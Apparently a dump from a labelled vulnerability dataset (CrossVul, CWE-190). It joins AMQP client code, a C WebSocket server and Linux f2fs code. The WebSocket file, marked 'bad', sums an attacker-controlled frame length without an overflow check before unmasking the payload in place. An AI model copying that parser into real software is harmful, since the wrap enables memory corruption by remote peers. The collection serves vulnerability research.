if ((ssize_t)encoded.len != sent) {
if (amqp_time_equal(next_timeout, deadline)) {
      /* the caller's timeout expired, so return from the method */
return AMQP_STATUS_TIMEOUT;
}
res = amqp_try_recv(state);
if (AMQP_STATUS_TIMEOUT == res) {
return AMQP_STATUS_HEARTBEAT_TIMEOUT;
} else if (AMQP_STATUS_OK != res) {
return res;
}
encoded.bytes = (uint8_t *)encoded.bytes + sent;
encoded.len -= sent;
goto start_send;
}
res = amqp_time_s_from_now(&state->next_send_heartbeat,
amqp_heartbeat_send(state));
return res;
}
amqp_table_t *amqp_get_server_properties(amqp_connection_state_t state) {
return &state->server_properties;
}
amqp_table_t *amqp_get_client_properties(amqp_connection_state_t state) {
return &state->client_properties;
}
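/*
 * Hypothetical usage sketch (not part of the original file): shows the
 * intended lifecycle of the connection state object managed above. The
 * connect/login/channel steps are elided; the function name is
 * illustrative only.
 */
static void amqp_connection_lifecycle_example(void) {
  amqp_connection_state_t conn = amqp_new_connection();
  if (conn == NULL) {
    return;
  }
  /* attach a TCP socket to the connection state (declared in
   * amqp_tcp_socket.h, which is already included above) */
  amqp_socket_t *sock = amqp_tcp_socket_new(conn);
  (void)sock; /* ... open the socket, log in and do channel work here ... */
  /* releases the channel pools, buffers and the attached socket */
  amqp_destroy_connection(conn);
}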
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_1203_0 |
crossvul-cpp_data_bad_402_3 | /*
* Description:
* History: yang@haipo.me, 2017/04/26, create
*/
# include <stdbool.h>
# include <openssl/sha.h>
# include "ut_log.h"
# include "ut_misc.h"
# include "ut_base64.h"
# include "ut_ws_svr.h"
struct ws_frame {
uint8_t fin;
uint8_t opcode;
uint64_t payload_len;
void *payload;
};
struct clt_info {
nw_ses *ses;
void *privdata;
double last_activity;
struct http_parser parser;
sds field;
bool field_set;
sds value;
bool value_set;
bool upgrade;
sds remote;
sds url;
sds message;
http_request_t *request;
struct ws_frame frame;
};
static int on_http_message_begin(http_parser* parser)
{
struct clt_info *info = parser->data;
if (info->request)
http_request_release(info->request);
info->request = http_request_new();
if (info->request == NULL) {
return -__LINE__;
}
return 0;
}
static int send_hand_shake_reply(nw_ses *ses, char *protocol, const char *key)
{
unsigned char hash[20];
sds data = sdsnew(key);
data = sdscat(data, "258EAFA5-E914-47DA-95CA-C5AB0DC85B11");
SHA1((const unsigned char *)data, sdslen(data), hash);
sdsfree(data);
sds b4message;
base64_encode(hash, sizeof(hash), &b4message);
http_response_t *response = http_response_new();
http_response_set_header(response, "Upgrade", "websocket");
http_response_set_header(response, "Connection", "Upgrade");
http_response_set_header(response, "Sec-WebSocket-Accept", b4message);
if (protocol) {
http_response_set_header(response, "Sec-WebSocket-Protocol", protocol);
}
response->status = 101;
sds message = http_response_encode(response);
nw_ses_send(ses, message, sdslen(message));
sdsfree(message);
sdsfree(b4message);
return 0;
}
static bool is_good_protocol(const char *protocol_list, const char *protocol)
{
char *tmp = strdup(protocol_list);
char *pch = strtok(tmp, ", ");
while (pch != NULL) {
if (strcmp(pch, protocol) == 0) {
free(tmp);
return true;
}
pch = strtok(NULL, ", ");
}
free(tmp);
return false;
}
static bool is_good_origin(const char *origin, const char *require)
{
size_t origin_len = strlen(origin);
size_t require_len = strlen(require);
if (origin_len < require_len)
return false;
if (memcmp(origin + (origin_len - require_len), require, require_len) != 0)
return false;
return true;
}
static int on_http_message_complete(http_parser* parser)
{
struct clt_info *info = parser->data;
ws_svr *svr = ws_svr_from_ses(info->ses);
info->request->version_major = parser->http_major;
info->request->version_minor = parser->http_minor;
info->request->method = parser->method;
dict_entry *entry;
dict_iterator *iter = dict_get_iterator(info->request->headers);
while ((entry = dict_next(iter)) != NULL) {
log_trace("Header: %s: %s", (char *)entry->key, (char *)entry->val);
}
dict_release_iterator(iter);
if (info->request->method != HTTP_GET)
goto error;
if (http_request_get_header(info->request, "Host") == NULL)
goto error;
double version = info->request->version_major + info->request->version_minor * 0.1;
if (version < 1.1)
goto error;
const char *upgrade = http_request_get_header(info->request, "Upgrade");
if (upgrade == NULL || strcasecmp(upgrade, "websocket") != 0)
goto error;
const char *connection = http_request_get_header(info->request, "Connection");
if (connection == NULL)
goto error;
else {
bool found_upgrade = false;
int count;
sds *tokens = sdssplitlen(connection, strlen(connection), ",", 1, &count);
if (tokens == NULL)
goto error;
for (int i = 0; i < count; i++) {
sds token = tokens[i];
sdstrim(token, " ");
if (strcasecmp(token, "Upgrade") == 0) {
found_upgrade = true;
break;
}
}
sdsfreesplitres(tokens, count);
if (!found_upgrade)
goto error;
}
const char *ws_version = http_request_get_header(info->request, "Sec-WebSocket-Version");
if (ws_version == NULL || strcmp(ws_version, "13") != 0)
goto error;
const char *ws_key = http_request_get_header(info->request, "Sec-WebSocket-Key");
if (ws_key == NULL)
goto error;
const char *protocol_list = http_request_get_header(info->request, "Sec-WebSocket-Protocol");
if (protocol_list && !is_good_protocol(protocol_list, svr->protocol))
goto error;
if (strlen(svr->origin) > 0) {
const char *origin = http_request_get_header(info->request, "Origin");
if (origin == NULL || !is_good_origin(origin, svr->origin))
goto error;
}
if (svr->type.on_privdata_alloc) {
info->privdata = svr->type.on_privdata_alloc(svr);
if (info->privdata == NULL)
goto error;
}
info->upgrade = true;
info->remote = sdsnew(http_get_remote_ip(info->ses, info->request));
info->url = sdsnew(info->request->url);
if (svr->type.on_upgrade) {
svr->type.on_upgrade(info->ses, info->remote);
}
if (protocol_list) {
send_hand_shake_reply(info->ses, svr->protocol, ws_key);
} else {
send_hand_shake_reply(info->ses, NULL, ws_key);
}
return 0;
error:
ws_svr_close_clt(ws_svr_from_ses(info->ses), info->ses);
return -1;
}
static int on_http_url(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
if (info->request->url)
sdsfree(info->request->url);
info->request->url = sdsnewlen(at, length);
return 0;
}
static int on_http_header_field(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->field_set = true;
if (info->field == NULL) {
info->field = sdsnewlen(at, length);
} else {
info->field = sdscpylen(info->field, at, length);
}
return 0;
}
static int on_http_header_value(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->value_set = true;
if (info->value == NULL) {
info->value = sdsnewlen(at, length);
} else {
info->value = sdscpylen(info->value, at, length);
}
if (info->field_set && info->value_set) {
http_request_set_header(info->request, info->field, info->value);
info->field_set = false;
info->value_set = false;
}
return 0;
}
static int on_http_body(http_parser* parser, const char* at, size_t length)
{
struct clt_info *info = parser->data;
info->request->body = sdsnewlen(at, length);
return 0;
}
static bool is_good_opcode(uint8_t opcode)
{
static uint8_t good_list[] = { 0x0, 0x1, 0x2, 0x8, 0x9, 0xa };
for (size_t i = 0; i < sizeof(good_list); ++i) {
if (opcode == good_list[i])
return true;
}
return false;
}
static int decode_pkg(nw_ses *ses, void *data, size_t max)
{
struct clt_info *info = ses->privdata;
if (!info->upgrade) {
return max;
}
if (max < 2)
return 0;
uint8_t *p = data;
size_t pkg_size = 0;
memset(&info->frame, 0, sizeof(info->frame));
info->frame.fin = p[0] & 0x80;
info->frame.opcode = p[0] & 0x0f;
if (!is_good_opcode(info->frame.opcode))
return -1;
uint8_t mask = p[1] & 0x80;
if (mask == 0)
return -1;
uint8_t len = p[1] & 0x7f;
if (len < 126) {
pkg_size = 2;
info->frame.payload_len = len;
} else if (len == 126) {
pkg_size = 2 + 2;
if (max < pkg_size)
return 0;
info->frame.payload_len = be16toh(*(uint16_t *)(p + 2));
} else if (len == 127) {
pkg_size = 2 + 8;
if (max < pkg_size)
return 0;
info->frame.payload_len = be64toh(*(uint64_t *)(p + 2));
}
uint8_t masks[4];
memcpy(masks, p + pkg_size, sizeof(masks));
pkg_size += sizeof(masks);
info->frame.payload = p + pkg_size;
pkg_size += info->frame.payload_len;
if (max < pkg_size)
return 0;
p = info->frame.payload;
for (size_t i = 0; i < info->frame.payload_len; ++i) {
p[i] = p[i] ^ masks[i & 3];
}
return pkg_size;
}
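/*
 * Illustrative sketch (not part of the original file): when the fixed
 * header bytes, the 4 mask bytes and the peer-supplied payload_len are
 * summed into pkg_size, the additions should be validated before any
 * payload is touched, otherwise the sum can wrap around on overflow.
 * The helper below is a hypothetical example of such a check; the name
 * is an assumption, not existing project API.
 */
static bool ws_frame_fits(size_t header_len, uint64_t payload_len, size_t max)
{
    /* reject payloads whose size cannot be added without wrapping */
    if (payload_len > (size_t)-1 - header_len)
        return false;
    return header_len + (size_t)payload_len <= max;
}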
static void on_error_msg(nw_ses *ses, const char *msg)
{
log_error("peer: %s: %s", nw_sock_human_addr(&ses->peer_addr), msg);
}
static void on_new_connection(nw_ses *ses)
{
log_trace("new connection from: %s", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
memset(info, 0, sizeof(struct clt_info));
info->ses = ses;
info->last_activity = current_timestamp();
http_parser_init(&info->parser, HTTP_REQUEST);
info->parser.data = info;
}
static void on_connection_close(nw_ses *ses)
{
log_trace("connection %s close", nw_sock_human_addr(&ses->peer_addr));
struct clt_info *info = ses->privdata;
struct ws_svr *svr = ws_svr_from_ses(ses);
if (info->upgrade) {
if (svr->type.on_close) {
svr->type.on_close(ses, info->remote);
}
if (svr->type.on_privdata_free) {
svr->type.on_privdata_free(svr, info->privdata);
}
}
}
static void *on_privdata_alloc(void *svr)
{
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
return nw_cache_alloc(w_svr->privdata_cache);
}
static void on_privdata_free(void *svr, void *privdata)
{
struct clt_info *info = privdata;
if (info->field) {
sdsfree(info->field);
}
if (info->value) {
sdsfree(info->value);
}
if (info->remote) {
sdsfree(info->remote);
}
if (info->url) {
sdsfree(info->url);
}
if (info->message) {
sdsfree(info->message);
}
if (info->request) {
http_request_release(info->request);
}
ws_svr *w_svr = ((nw_svr *)svr)->privdata;
nw_cache_free(w_svr->privdata_cache, privdata);
}
static int send_reply(nw_ses *ses, uint8_t opcode, void *payload, size_t payload_len)
{
if (payload == NULL)
payload_len = 0;
static void *buf;
static size_t buf_size = 1024;
if (buf == NULL) {
buf = malloc(1024);
if (buf == NULL)
return -1;
}
size_t require_len = 10 + payload_len;
if (buf_size < require_len) {
void *new = realloc(buf, require_len);
if (new == NULL)
return -1;
buf = new;
buf_size = require_len;
}
size_t pkg_len = 0;
uint8_t *p = buf;
p[0] = 0;
p[0] |= 0x1 << 7;
p[0] |= opcode;
p[1] = 0;
if (payload_len < 126) {
uint8_t len = payload_len;
p[1] |= len;
pkg_len = 2;
} else if (payload_len <= 0xffff) {
p[1] |= 126;
uint16_t len = htobe16((uint16_t)payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
} else {
p[1] |= 127;
uint64_t len = htobe64(payload_len);
memcpy(p + 2, &len, sizeof(len));
pkg_len = 2 + sizeof(len);
}
if (payload) {
memcpy(p + pkg_len, payload, payload_len);
pkg_len += payload_len;
}
return nw_ses_send(ses, buf, pkg_len);
}
static int send_pong_message(nw_ses *ses)
{
return send_reply(ses, 0xa, NULL, 0);
}
static void on_recv_pkg(nw_ses *ses, void *data, size_t size)
{
struct clt_info *info = ses->privdata;
ws_svr *svr = ws_svr_from_ses(ses);
info->last_activity = current_timestamp();
if (!info->upgrade) {
size_t nparsed = http_parser_execute(&info->parser, &svr->settings, data, size);
if (!info->parser.upgrade && nparsed != size) {
log_error("peer: %s http parse error: %s (%s)", nw_sock_human_addr(&ses->peer_addr),
http_errno_description(HTTP_PARSER_ERRNO(&info->parser)),
http_errno_name(HTTP_PARSER_ERRNO(&info->parser)));
nw_svr_close_clt(svr->raw_svr, ses);
}
return;
}
switch (info->frame.opcode) {
case 0x8:
nw_svr_close_clt(svr->raw_svr, ses);
return;
case 0x9:
send_pong_message(ses);
return;
case 0xa:
return;
}
if (info->message == NULL)
info->message = sdsempty();
info->message = sdscatlen(info->message, info->frame.payload, info->frame.payload_len);
if (info->frame.fin) {
int ret = svr->type.on_message(ses, info->remote, info->url, info->message, sdslen(info->message));
if (ses->id != 0) {
if (ret < 0) {
nw_svr_close_clt(svr->raw_svr, ses);
} else {
sdsfree(info->message);
info->message = NULL;
}
}
}
}
static void on_timer(nw_timer *timer, void *privdata)
{
ws_svr *svr = privdata;
double now = current_timestamp();
nw_ses *curr = svr->raw_svr->clt_list_head;
nw_ses *next;
while (curr) {
next = curr->next;
struct clt_info *info = curr->privdata;
if (now - info->last_activity > svr->keep_alive) {
log_error("peer: %s: last_activity: %f, idle too long", nw_sock_human_addr(&curr->peer_addr), info->last_activity);
nw_svr_close_clt(svr->raw_svr, curr);
}
curr = next;
}
}
ws_svr *ws_svr_create(ws_svr_cfg *cfg, ws_svr_type *type)
{
if (type->on_message == NULL)
return NULL;
if (type->on_privdata_alloc && !type->on_privdata_free)
return NULL;
ws_svr *svr = malloc(sizeof(ws_svr));
memset(svr, 0, sizeof(ws_svr));
nw_svr_cfg raw_cfg;
memset(&raw_cfg, 0, sizeof(raw_cfg));
raw_cfg.bind_count = cfg->bind_count;
raw_cfg.bind_arr = cfg->bind_arr;
raw_cfg.max_pkg_size = cfg->max_pkg_size;
raw_cfg.buf_limit = cfg->buf_limit;
raw_cfg.read_mem = cfg->read_mem;
raw_cfg.write_mem = cfg->write_mem;
nw_svr_type st;
memset(&st, 0, sizeof(st));
st.decode_pkg = decode_pkg;
st.on_error_msg = on_error_msg;
st.on_new_connection = on_new_connection;
st.on_connection_close = on_connection_close;
st.on_recv_pkg = on_recv_pkg;
st.on_privdata_alloc = on_privdata_alloc;
st.on_privdata_free = on_privdata_free;
svr->raw_svr = nw_svr_create(&raw_cfg, &st, svr);
if (svr->raw_svr == NULL) {
free(svr);
return NULL;
}
memset(&svr->settings, 0, sizeof(http_parser_settings));
svr->settings.on_message_begin = on_http_message_begin;
svr->settings.on_url = on_http_url;
svr->settings.on_header_field = on_http_header_field;
svr->settings.on_header_value = on_http_header_value;
svr->settings.on_body = on_http_body;
svr->settings.on_message_complete = on_http_message_complete;
svr->keep_alive = cfg->keep_alive;
svr->protocol = strdup(cfg->protocol);
svr->origin = strdup(cfg->origin);
svr->privdata_cache = nw_cache_create(sizeof(struct clt_info));
memcpy(&svr->type, type, sizeof(ws_svr_type));
if (cfg->keep_alive > 0) {
nw_timer_set(&svr->timer, 60, true, on_timer, svr);
nw_timer_start(&svr->timer);
}
return svr;
}
int ws_svr_start(ws_svr *svr)
{
int ret = nw_svr_start(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
int ws_svr_stop(ws_svr *svr)
{
int ret = nw_svr_stop(svr->raw_svr);
if (ret < 0)
return ret;
return 0;
}
ws_svr *ws_svr_from_ses(nw_ses *ses)
{
return ((nw_svr *)ses->svr)->privdata;
}
void *ws_ses_privdata(nw_ses *ses)
{
struct clt_info *info = ses->privdata;
return info->privdata;
}
int ws_send_text(nw_ses *ses, char *message)
{
return send_reply(ses, 0x1, message, strlen(message));
}
int ws_send_binary(nw_ses *ses, void *data, size_t size)
{
return send_reply(ses, 0x2, data, size);
}
static int broadcast_message(ws_svr *svr, uint8_t opcode, void *data, size_t size)
{
nw_ses *curr = svr->raw_svr->clt_list_head;
while (curr) {
nw_ses *next = curr->next;
struct clt_info *info = curr->privdata;
if (info->upgrade) {
int ret = send_reply(curr, opcode, data, size);
if (ret < 0)
return ret;
}
curr = next;
}
return 0;
}
int ws_svr_broadcast_text(ws_svr *svr, char *message)
{
return broadcast_message(svr, 0x1, message, strlen(message));
}
int ws_svr_broadcast_binary(ws_svr *svr, void *data, size_t size)
{
return broadcast_message(svr, 0x2, data, size);
}
void ws_svr_close_clt(ws_svr *svr, nw_ses *ses)
{
nw_svr_close_clt(svr->raw_svr, ses);
}
void ws_svr_release(ws_svr *svr)
{
nw_svr_release(svr->raw_svr);
nw_timer_stop(&svr->timer);
nw_cache_release(svr->privdata_cache);
free(svr->protocol);
free(svr);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_402_3 |
crossvul-cpp_data_good_3028_0 | /*
* fs/f2fs/data.c
*
* Copyright (c) 2012 Samsung Electronics Co., Ltd.
* http://www.samsung.com/
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*/
#include <linux/fs.h>
#include <linux/f2fs_fs.h>
#include <linux/buffer_head.h>
#include <linux/mpage.h>
#include <linux/writeback.h>
#include <linux/backing-dev.h>
#include <linux/pagevec.h>
#include <linux/blkdev.h>
#include <linux/bio.h>
#include <linux/prefetch.h>
#include <linux/uio.h>
#include <linux/mm.h>
#include <linux/memcontrol.h>
#include <linux/cleancache.h>
#include "f2fs.h"
#include "node.h"
#include "segment.h"
#include "trace.h"
#include <trace/events/f2fs.h>
static bool __is_cp_guaranteed(struct page *page)
{
struct address_space *mapping = page->mapping;
struct inode *inode;
struct f2fs_sb_info *sbi;
if (!mapping)
return false;
inode = mapping->host;
sbi = F2FS_I_SB(inode);
if (inode->i_ino == F2FS_META_INO(sbi) ||
inode->i_ino == F2FS_NODE_INO(sbi) ||
S_ISDIR(inode->i_mode) ||
is_cold_data(page))
return true;
return false;
}
static void f2fs_read_end_io(struct bio *bio)
{
struct bio_vec *bvec;
int i;
#ifdef CONFIG_F2FS_FAULT_INJECTION
if (time_to_inject(F2FS_P_SB(bio->bi_io_vec->bv_page), FAULT_IO))
bio->bi_error = -EIO;
#endif
if (f2fs_bio_encrypted(bio)) {
if (bio->bi_error) {
fscrypt_release_ctx(bio->bi_private);
} else {
fscrypt_decrypt_bio_pages(bio->bi_private, bio);
return;
}
}
bio_for_each_segment_all(bvec, bio, i) {
struct page *page = bvec->bv_page;
if (!bio->bi_error) {
if (!PageUptodate(page))
SetPageUptodate(page);
} else {
ClearPageUptodate(page);
SetPageError(page);
}
unlock_page(page);
}
bio_put(bio);
}
static void f2fs_write_end_io(struct bio *bio)
{
struct f2fs_sb_info *sbi = bio->bi_private;
struct bio_vec *bvec;
int i;
bio_for_each_segment_all(bvec, bio, i) {
struct page *page = bvec->bv_page;
enum count_type type = WB_DATA_TYPE(page);
if (IS_DUMMY_WRITTEN_PAGE(page)) {
set_page_private(page, (unsigned long)NULL);
ClearPagePrivate(page);
unlock_page(page);
mempool_free(page, sbi->write_io_dummy);
if (unlikely(bio->bi_error))
f2fs_stop_checkpoint(sbi, true);
continue;
}
fscrypt_pullback_bio_page(&page, true);
if (unlikely(bio->bi_error)) {
mapping_set_error(page->mapping, -EIO);
f2fs_stop_checkpoint(sbi, true);
}
dec_page_count(sbi, type);
clear_cold_data(page);
end_page_writeback(page);
}
if (!get_pages(sbi, F2FS_WB_CP_DATA) &&
wq_has_sleeper(&sbi->cp_wait))
wake_up(&sbi->cp_wait);
bio_put(bio);
}
/*
* Return true, if pre_bio's bdev is same as its target device.
*/
struct block_device *f2fs_target_device(struct f2fs_sb_info *sbi,
block_t blk_addr, struct bio *bio)
{
struct block_device *bdev = sbi->sb->s_bdev;
int i;
for (i = 0; i < sbi->s_ndevs; i++) {
if (FDEV(i).start_blk <= blk_addr &&
FDEV(i).end_blk >= blk_addr) {
blk_addr -= FDEV(i).start_blk;
bdev = FDEV(i).bdev;
break;
}
}
if (bio) {
bio->bi_bdev = bdev;
bio->bi_iter.bi_sector = SECTOR_FROM_BLOCK(blk_addr);
}
return bdev;
}
int f2fs_target_device_index(struct f2fs_sb_info *sbi, block_t blkaddr)
{
int i;
for (i = 0; i < sbi->s_ndevs; i++)
if (FDEV(i).start_blk <= blkaddr && FDEV(i).end_blk >= blkaddr)
return i;
return 0;
}
static bool __same_bdev(struct f2fs_sb_info *sbi,
block_t blk_addr, struct bio *bio)
{
return f2fs_target_device(sbi, blk_addr, NULL) == bio->bi_bdev;
}
/*
* Low-level block read/write IO operations.
*/
static struct bio *__bio_alloc(struct f2fs_sb_info *sbi, block_t blk_addr,
int npages, bool is_read)
{
struct bio *bio;
bio = f2fs_bio_alloc(npages);
f2fs_target_device(sbi, blk_addr, bio);
bio->bi_end_io = is_read ? f2fs_read_end_io : f2fs_write_end_io;
bio->bi_private = is_read ? NULL : sbi;
return bio;
}
static inline void __submit_bio(struct f2fs_sb_info *sbi,
struct bio *bio, enum page_type type)
{
if (!is_read_io(bio_op(bio))) {
unsigned int start;
if (f2fs_sb_mounted_blkzoned(sbi->sb) &&
current->plug && (type == DATA || type == NODE))
blk_finish_plug(current->plug);
if (type != DATA && type != NODE)
goto submit_io;
start = bio->bi_iter.bi_size >> F2FS_BLKSIZE_BITS;
start %= F2FS_IO_SIZE(sbi);
if (start == 0)
goto submit_io;
/* fill dummy pages */
for (; start < F2FS_IO_SIZE(sbi); start++) {
struct page *page =
mempool_alloc(sbi->write_io_dummy,
GFP_NOIO | __GFP_ZERO | __GFP_NOFAIL);
f2fs_bug_on(sbi, !page);
SetPagePrivate(page);
set_page_private(page, (unsigned long)DUMMY_WRITTEN_PAGE);
lock_page(page);
if (bio_add_page(bio, page, PAGE_SIZE, 0) < PAGE_SIZE)
f2fs_bug_on(sbi, 1);
}
/*
* In the NODE case, we lose next block address chain. So, we
* need to do checkpoint in f2fs_sync_file.
*/
if (type == NODE)
set_sbi_flag(sbi, SBI_NEED_CP);
}
submit_io:
if (is_read_io(bio_op(bio)))
trace_f2fs_submit_read_bio(sbi->sb, type, bio);
else
trace_f2fs_submit_write_bio(sbi->sb, type, bio);
submit_bio(bio);
}
static void __submit_merged_bio(struct f2fs_bio_info *io)
{
struct f2fs_io_info *fio = &io->fio;
if (!io->bio)
return;
bio_set_op_attrs(io->bio, fio->op, fio->op_flags);
if (is_read_io(fio->op))
trace_f2fs_prepare_read_bio(io->sbi->sb, fio->type, io->bio);
else
trace_f2fs_prepare_write_bio(io->sbi->sb, fio->type, io->bio);
__submit_bio(io->sbi, io->bio, fio->type);
io->bio = NULL;
}
static bool __has_merged_page(struct f2fs_bio_info *io, struct inode *inode,
struct page *page, nid_t ino)
{
struct bio_vec *bvec;
struct page *target;
int i;
if (!io->bio)
return false;
if (!inode && !page && !ino)
return true;
bio_for_each_segment_all(bvec, io->bio, i) {
if (bvec->bv_page->mapping)
target = bvec->bv_page;
else
target = fscrypt_control_page(bvec->bv_page);
if (inode && inode == target->mapping->host)
return true;
if (page && page == target)
return true;
if (ino && ino == ino_of_node(target))
return true;
}
return false;
}
static bool has_merged_page(struct f2fs_sb_info *sbi, struct inode *inode,
struct page *page, nid_t ino,
enum page_type type)
{
enum page_type btype = PAGE_TYPE_OF_BIO(type);
struct f2fs_bio_info *io = &sbi->write_io[btype];
bool ret;
down_read(&io->io_rwsem);
ret = __has_merged_page(io, inode, page, ino);
up_read(&io->io_rwsem);
return ret;
}
static void __f2fs_submit_merged_bio(struct f2fs_sb_info *sbi,
struct inode *inode, struct page *page,
nid_t ino, enum page_type type, int rw)
{
enum page_type btype = PAGE_TYPE_OF_BIO(type);
struct f2fs_bio_info *io;
io = is_read_io(rw) ? &sbi->read_io : &sbi->write_io[btype];
down_write(&io->io_rwsem);
if (!__has_merged_page(io, inode, page, ino))
goto out;
/* change META to META_FLUSH in the checkpoint procedure */
if (type >= META_FLUSH) {
io->fio.type = META_FLUSH;
io->fio.op = REQ_OP_WRITE;
io->fio.op_flags = REQ_PREFLUSH | REQ_META | REQ_PRIO;
if (!test_opt(sbi, NOBARRIER))
io->fio.op_flags |= REQ_FUA;
}
__submit_merged_bio(io);
out:
up_write(&io->io_rwsem);
}
void f2fs_submit_merged_bio(struct f2fs_sb_info *sbi, enum page_type type,
int rw)
{
__f2fs_submit_merged_bio(sbi, NULL, NULL, 0, type, rw);
}
void f2fs_submit_merged_bio_cond(struct f2fs_sb_info *sbi,
struct inode *inode, struct page *page,
nid_t ino, enum page_type type, int rw)
{
if (has_merged_page(sbi, inode, page, ino, type))
__f2fs_submit_merged_bio(sbi, inode, page, ino, type, rw);
}
void f2fs_flush_merged_bios(struct f2fs_sb_info *sbi)
{
f2fs_submit_merged_bio(sbi, DATA, WRITE);
f2fs_submit_merged_bio(sbi, NODE, WRITE);
f2fs_submit_merged_bio(sbi, META, WRITE);
}
/*
* Fill the locked page with data located in the block address.
* Return unlocked page.
*/
int f2fs_submit_page_bio(struct f2fs_io_info *fio)
{
struct bio *bio;
struct page *page = fio->encrypted_page ?
fio->encrypted_page : fio->page;
trace_f2fs_submit_page_bio(page, fio);
f2fs_trace_ios(fio, 0);
/* Allocate a new bio */
bio = __bio_alloc(fio->sbi, fio->new_blkaddr, 1, is_read_io(fio->op));
if (bio_add_page(bio, page, PAGE_SIZE, 0) < PAGE_SIZE) {
bio_put(bio);
return -EFAULT;
}
bio_set_op_attrs(bio, fio->op, fio->op_flags);
__submit_bio(fio->sbi, bio, fio->type);
return 0;
}
int f2fs_submit_page_mbio(struct f2fs_io_info *fio)
{
struct f2fs_sb_info *sbi = fio->sbi;
enum page_type btype = PAGE_TYPE_OF_BIO(fio->type);
struct f2fs_bio_info *io;
bool is_read = is_read_io(fio->op);
struct page *bio_page;
int err = 0;
io = is_read ? &sbi->read_io : &sbi->write_io[btype];
if (fio->old_blkaddr != NEW_ADDR)
verify_block_addr(sbi, fio->old_blkaddr);
verify_block_addr(sbi, fio->new_blkaddr);
bio_page = fio->encrypted_page ? fio->encrypted_page : fio->page;
if (!is_read)
inc_page_count(sbi, WB_DATA_TYPE(bio_page));
down_write(&io->io_rwsem);
if (io->bio && (io->last_block_in_bio != fio->new_blkaddr - 1 ||
(io->fio.op != fio->op || io->fio.op_flags != fio->op_flags) ||
!__same_bdev(sbi, fio->new_blkaddr, io->bio)))
__submit_merged_bio(io);
alloc_new:
if (io->bio == NULL) {
if ((fio->type == DATA || fio->type == NODE) &&
fio->new_blkaddr & F2FS_IO_SIZE_MASK(sbi)) {
err = -EAGAIN;
dec_page_count(sbi, WB_DATA_TYPE(bio_page));
goto out_fail;
}
io->bio = __bio_alloc(sbi, fio->new_blkaddr,
BIO_MAX_PAGES, is_read);
io->fio = *fio;
}
if (bio_add_page(io->bio, bio_page, PAGE_SIZE, 0) <
PAGE_SIZE) {
__submit_merged_bio(io);
goto alloc_new;
}
io->last_block_in_bio = fio->new_blkaddr;
f2fs_trace_ios(fio, 0);
out_fail:
up_write(&io->io_rwsem);
trace_f2fs_submit_page_mbio(fio->page, fio);
return err;
}
static void __set_data_blkaddr(struct dnode_of_data *dn)
{
struct f2fs_node *rn = F2FS_NODE(dn->node_page);
__le32 *addr_array;
/* Get physical address of data block */
addr_array = blkaddr_in_node(rn);
addr_array[dn->ofs_in_node] = cpu_to_le32(dn->data_blkaddr);
}
/*
* Lock ordering for the change of data block address:
* ->data_page
* ->node_page
* update block addresses in the node page
*/
void set_data_blkaddr(struct dnode_of_data *dn)
{
f2fs_wait_on_page_writeback(dn->node_page, NODE, true);
__set_data_blkaddr(dn);
if (set_page_dirty(dn->node_page))
dn->node_changed = true;
}
void f2fs_update_data_blkaddr(struct dnode_of_data *dn, block_t blkaddr)
{
dn->data_blkaddr = blkaddr;
set_data_blkaddr(dn);
f2fs_update_extent_cache(dn);
}
/* dn->ofs_in_node will be returned with up-to-date last block pointer */
int reserve_new_blocks(struct dnode_of_data *dn, blkcnt_t count)
{
struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
if (!count)
return 0;
if (unlikely(is_inode_flag_set(dn->inode, FI_NO_ALLOC)))
return -EPERM;
if (unlikely(!inc_valid_block_count(sbi, dn->inode, &count)))
return -ENOSPC;
trace_f2fs_reserve_new_blocks(dn->inode, dn->nid,
dn->ofs_in_node, count);
f2fs_wait_on_page_writeback(dn->node_page, NODE, true);
for (; count > 0; dn->ofs_in_node++) {
block_t blkaddr =
datablock_addr(dn->node_page, dn->ofs_in_node);
if (blkaddr == NULL_ADDR) {
dn->data_blkaddr = NEW_ADDR;
__set_data_blkaddr(dn);
count--;
}
}
if (set_page_dirty(dn->node_page))
dn->node_changed = true;
return 0;
}
/* Should keep dn->ofs_in_node unchanged */
int reserve_new_block(struct dnode_of_data *dn)
{
unsigned int ofs_in_node = dn->ofs_in_node;
int ret;
ret = reserve_new_blocks(dn, 1);
dn->ofs_in_node = ofs_in_node;
return ret;
}
int f2fs_reserve_block(struct dnode_of_data *dn, pgoff_t index)
{
bool need_put = dn->inode_page ? false : true;
int err;
err = get_dnode_of_data(dn, index, ALLOC_NODE);
if (err)
return err;
if (dn->data_blkaddr == NULL_ADDR)
err = reserve_new_block(dn);
if (err || need_put)
f2fs_put_dnode(dn);
return err;
}
int f2fs_get_block(struct dnode_of_data *dn, pgoff_t index)
{
struct extent_info ei;
struct inode *inode = dn->inode;
if (f2fs_lookup_extent_cache(inode, index, &ei)) {
dn->data_blkaddr = ei.blk + index - ei.fofs;
return 0;
}
return f2fs_reserve_block(dn, index);
}
struct page *get_read_data_page(struct inode *inode, pgoff_t index,
int op_flags, bool for_write)
{
struct address_space *mapping = inode->i_mapping;
struct dnode_of_data dn;
struct page *page;
struct extent_info ei;
int err;
struct f2fs_io_info fio = {
.sbi = F2FS_I_SB(inode),
.type = DATA,
.op = REQ_OP_READ,
.op_flags = op_flags,
.encrypted_page = NULL,
};
if (f2fs_encrypted_inode(inode) && S_ISREG(inode->i_mode))
return read_mapping_page(mapping, index, NULL);
page = f2fs_grab_cache_page(mapping, index, for_write);
if (!page)
return ERR_PTR(-ENOMEM);
if (f2fs_lookup_extent_cache(inode, index, &ei)) {
dn.data_blkaddr = ei.blk + index - ei.fofs;
goto got_it;
}
set_new_dnode(&dn, inode, NULL, NULL, 0);
err = get_dnode_of_data(&dn, index, LOOKUP_NODE);
if (err)
goto put_err;
f2fs_put_dnode(&dn);
if (unlikely(dn.data_blkaddr == NULL_ADDR)) {
err = -ENOENT;
goto put_err;
}
got_it:
if (PageUptodate(page)) {
unlock_page(page);
return page;
}
/*
* A new dentry page is allocated but not able to be written, since its
